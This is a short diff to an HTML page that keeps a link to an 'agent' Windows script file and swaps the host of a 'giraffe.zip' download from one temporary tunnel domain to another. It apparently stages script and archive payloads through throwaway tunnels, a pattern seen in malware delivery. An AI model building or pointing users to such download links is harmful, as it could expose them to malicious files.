--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://rnmoh-2a00-1370-8174-60f1-f968-2f52-4150-7888.a.free.pinggy.link/agent/giraffe.zip">Giraffe</a>
+<a href="https://a02a7982a6005b.lhr.life/agent/giraffe.zip">Giraffe</a>
     
